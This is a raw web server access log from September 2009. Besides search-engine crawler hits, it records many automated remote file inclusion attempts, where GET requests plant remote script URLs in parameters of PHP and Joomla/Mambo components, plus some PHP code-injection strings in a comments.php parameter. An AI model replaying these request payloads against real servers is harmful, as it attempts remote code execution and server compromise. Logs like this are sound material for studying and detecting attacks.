72.51.42.92 - - [11/Sep/2009:02:01:55 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.51.42.92 - - [11/Sep/2009:02:02:00 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.51.42.92 - - [11/Sep/2009:02:02:00 -0500] "GET /logs/access_log.1243814400//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:02:03:41 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:02:03:44 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:02:03:44 -0500] "GET /logs/access_log.1236211200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:02:06:43 -0500] "GET /logs/access_log.1238803200/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:02:06:43 -0500] "GET /errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:02:06:43 -0500] "GET /logs/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:02:06:51 -0500] "GET /logs/access_log.1235520000/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.186.64.229 - - [11/Sep/2009:02:07:17 -0500] "GET /logs/access_log.1241395200//admin/ST_platforms.php?include_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 321 "-""Mozilla/5.0"
195.186.64.229 - - [11/Sep/2009:02:07:17 -0500] "GET //admin/ST_platforms.php?include_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 294 "-""Mozilla/5.0"
195.186.64.229 - - [11/Sep/2009:02:07:17 -0500] "GET /logs//admin/ST_platforms.php?include_path=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 299 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:02:07:41 -0500] "GET //config/dbutil.bck.php?confdir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:02:07:41 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:02:07:44 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.249.68.48 - - [11/Sep/2009:02:08:11 -0500] "GET /logs/access_log.1246147200 HTTP/1.1" 200 559868 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
117.110.59.2 - - [11/Sep/2009:02:08:44 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:08:44 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:08:44 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:08:47 -0500] "GET /logs/access_log.1242864000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
65.55.106.208 - - [11/Sep/2009:02:10:08 -0500] "GET /logs/access_log.1198454400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.166.203 - - [11/Sep/2009:02:10:12 -0500] "GET //components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lhes.tcc.edu.tw/lhes_system/hw/upload/abacho/id2.txt??? HTTP/1.1" 404 316 "-""Mozilla/5.0"
118.129.166.203 - - [11/Sep/2009:02:10:12 -0500] "GET /logs//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lhes.tcc.edu.tw/lhes_system/hw/upload/abacho/id2.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.129.166.203 - - [11/Sep/2009:02:10:12 -0500] "GET /logs/access_log.1243900800//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lhes.tcc.edu.tw/lhes_system/hw/upload/abacho/id2.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
118.129.166.203 - - [11/Sep/2009:02:10:22 -0500] "GET /logs/access_log.1239926400//components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.lhes.tcc.edu.tw/lhes_system/hw/upload/abacho/id2.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:02:10:52 -0500] "GET /errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:02:10:52 -0500] "GET /logs/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:02:10:52 -0500] "GET /logs/access_log.1238803200/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:11:18 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:11:18 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:11:18 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
59.24.49.35 - - [11/Sep/2009:02:11:21 -0500] "GET /logs/access_log.1235520000/errors.php?error=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:11:53 -0500] "GET /logs/access_log.1242864000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:02:12:47 -0500] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:02:12:47 -0500] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:02:12:47 -0500] "GET /logs/access_log.1236470400//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:02:12:48 -0500] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:02:12:48 -0500] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.110.11.75 - - [11/Sep/2009:02:12:49 -0500] "GET /logs/access_log.1236470400//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://kowpa.x-y.net/bbs//skin/ggambo7002_board/idfx1.txt? HTTP/1.1" 404 354 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:02:13:16 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:02:13:16 -0500] "GET /logs/access_log.1244764800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:02:13:16 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:02:13:17 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:02:13:17 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.75.202.55 - - [11/Sep/2009:02:13:17 -0500] "GET /logs/access_log.1244764800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.232 - - [11/Sep/2009:02:17:07 -0500] "GET /logs/access_log.1117929600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
206.225.23.4 - - [11/Sep/2009:02:17:39 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:02:17:39 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:02:17:39 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:02:17:42 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:02:17:42 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 325 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:02:17:42 -0500] "GET /logs/access_log.1237248000//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
206.225.23.4 - - [11/Sep/2009:02:17:51 -0500] "GET /logs/access_log.1245715200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.230.164 - - [11/Sep/2009:02:17:54 -0500] "GET /logs/access_log.1121731200 HTTP/1.1" 304 - "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:02:17:54 -0500] "GET /logs/access_log.1155600000 HTTP/1.1" 304 - "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:02:17:54 -0500] "GET /logs/access_log.1155772800 HTTP/1.1" 304 - "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:02:17:54 -0500] "GET /logs/access_log.1166745600 HTTP/1.1" 304 - "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:02:17:54 -0500] "GET /logs/access_log.1146787200 HTTP/1.1" 304 - "-""Mozilla/4.0"
206.225.23.4 - - [11/Sep/2009:02:17:54 -0500] "GET /logs/access_log.1245715200//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.230.164 - - [11/Sep/2009:02:17:54 -0500] "GET /logs/access_log.1170979200 HTTP/1.1" 304 - "-""Mozilla/4.0"
85.18.236.8 - - [11/Sep/2009:02:18:35 -0500] "GET /logs/access_log.1234137600//config/dbutil.bck.php?confdir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
65.55.106.108 - - [11/Sep/2009:02:21:18 -0500] "GET /logs/access_log.1151452800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.68.48 - - [11/Sep/2009:02:24:17 -0500] "GET /logs/access_log.1247011200 HTTP/1.1" 200 734695 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.106.113 - - [11/Sep/2009:02:27:07 -0500] "GET /logs/access_log.1154995200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.231 - - [11/Sep/2009:02:28:09 -0500] "GET /logs/access_log.1221004800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.90.108.169 - - [11/Sep/2009:02:28:12 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:02:28:12 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:02:28:12 -0500] "GET /logs/access_log.1244764800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.230.165 - - [11/Sep/2009:02:29:11 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""Mozilla/4.0"
65.55.230.165 - - [11/Sep/2009:02:29:13 -0500] "GET /logs/access_log.1243987200 HTTP/1.1" 200 572923 "-""Mozilla/4.0"
117.110.59.2 - - [11/Sep/2009:02:32:47 -0500] "GET /logs/access_log.1244764800//modules/agendax/addevent.inc.php?agendax_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:32:48 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:32:48 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:02:34:00 -0500] "GET /logs/access_log.1237075200/convert/mvcw.php?vwar_root=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:02:34:00 -0500] "GET /convert/mvcw.php?vwar_root=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:02:34:00 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:02:34:37 -0500] "GET /logs/access_log.1244764800//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:02:34:37 -0500] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
174.37.136.126 - - [11/Sep/2009:02:34:37 -0500] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
82.151.132.176 - - [11/Sep/2009:02:34:48 -0500] "GET /logs/access_log.1244764800/convert/mvcw.php?vwar_root=http://licitalok.com/includes/popups/one.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
64.6.232.171 - - [11/Sep/2009:02:35:53 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.j-vintage.com/jvntg/perkosa.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
64.6.232.171 - - [11/Sep/2009:02:35:53 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.j-vintage.com/jvntg/perkosa.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.6.232.171 - - [11/Sep/2009:02:36:18 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.j-vintage.com/jvntg/perkosa.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
64.6.232.171 - - [11/Sep/2009:02:36:18 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.j-vintage.com/jvntg/perkosa.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
66.249.68.48 - - [11/Sep/2009:02:39:56 -0500] "GET /logs/access_log.1243814400 HTTP/1.1" 200 529974 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
65.55.207.123 - - [11/Sep/2009:02:45:37 -0500] "GET /logs/access_log.1196294400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.90.108.169 - - [11/Sep/2009:02:49:01 -0500] "GET ///pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:02:49:02 -0500] "GET /logs/access_log.1241136000///pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:02:49:02 -0500] "GET /logs///pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.90.108.169 - - [11/Sep/2009:02:49:03 -0500] "GET /logs/access_log.1246320000///pm/add_ons/mail_this_entry/mail_autocheck.php?pm_path=http://www.frostbytes.com/regina/copyright.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
64.191.68.53 - - [11/Sep/2009:02:50:33 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
64.191.68.53 - - [11/Sep/2009:02:50:33 -0500] "GET /logs/access_log.1241654400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.191.68.53 - - [11/Sep/2009:02:50:33 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
64.191.68.53 - - [11/Sep/2009:02:50:33 -0500] "GET /logs/access_log.1243209600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:02:52:00 -0500] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:02:52:00 -0500] "GET /logs/access_log.1244764800//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
121.78.116.209 - - [11/Sep/2009:02:52:00 -0500] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:52:25 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:52:25 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
117.110.59.2 - - [11/Sep/2009:02:52:25 -0500] "GET /logs/access_log.1244764800//modules/agendax/addevent.inc.php?agendax_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/zfxid1.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
65.55.106.163 - - [11/Sep/2009:02:53:38 -0500] "GET /logs/access_log.1158796800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.60.39.218 - - [11/Sep/2009:02:55:30 -0500] "GET /agenda2.php3?rootagenda=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
65.60.39.218 - - [11/Sep/2009:02:55:30 -0500] "GET /logs/access_log.1235606400/agenda2.php3?rootagenda=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
65.60.39.218 - - [11/Sep/2009:02:55:30 -0500] "GET /logs/agenda2.php3?rootagenda=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
65.55.207.97 - - [11/Sep/2009:02:55:37 -0500] "GET /logs/access_log.1243641600 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.60.39.218 - - [11/Sep/2009:02:55:44 -0500] "GET /logs/access_log.1238889600/agenda2.php3?rootagenda=http://snowmovement.com/admin/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.249.68.48 - - [11/Sep/2009:02:56:34 -0500] "GET /logs/access_log.1244678400 HTTP/1.1" 200 603560 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
85.18.236.8 - - [11/Sep/2009:02:57:07 -0500] "GET //admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:02:57:07 -0500] "GET /logs//admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:02:57:07 -0500] "GET /logs/access_log.1244764800//admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
211.48.121.149 - - [11/Sep/2009:02:59:48 -0500] "GET //admin/setupform.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
117.74.98.18 - - [11/Sep/2009:02:59:49 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
117.74.98.18 - - [11/Sep/2009:02:59:49 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
117.74.98.18 - - [11/Sep/2009:02:59:49 -0500] "GET /logs/access_log.1243209600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
117.74.98.18 - - [11/Sep/2009:02:59:49 -0500] "GET /logs/access_log.1241654400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.musikwyler.ch/tickets/fjear1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
211.48.121.149 - - [11/Sep/2009:02:59:49 -0500] "GET /logs//admin/setupform.php?dir=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
65.55.230.164 - - [11/Sep/2009:03:00:51 -0500] "GET /logs/access_log.1124150400 HTTP/1.1" 304 - "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:03:00:52 -0500] "GET /logs/access_log.1115596800 HTTP/1.1" 304 - "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:03:00:52 -0500] "GET /logs/access_log.1180483200 HTTP/1.1" 304 - "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:03:00:52 -0500] "GET /logs/access_log.1186963200 HTTP/1.1" 304 - "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:03:00:52 -0500] "GET /logs/access_log.1151884800 HTTP/1.1" 304 - "-""Mozilla/4.0"
65.55.230.164 - - [11/Sep/2009:03:00:52 -0500] "GET /logs/access_log.1122076800 HTTP/1.1" 304 - "-""Mozilla/4.0"
85.18.236.8 - - [11/Sep/2009:03:03:31 -0500] "GET /logs/access_log.1244764800//admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:03:03:31 -0500] "GET //admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
85.18.236.8 - - [11/Sep/2009:03:03:31 -0500] "GET /logs//admin/setupform.php?_SERVER[DOCUMENT_ROOT]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
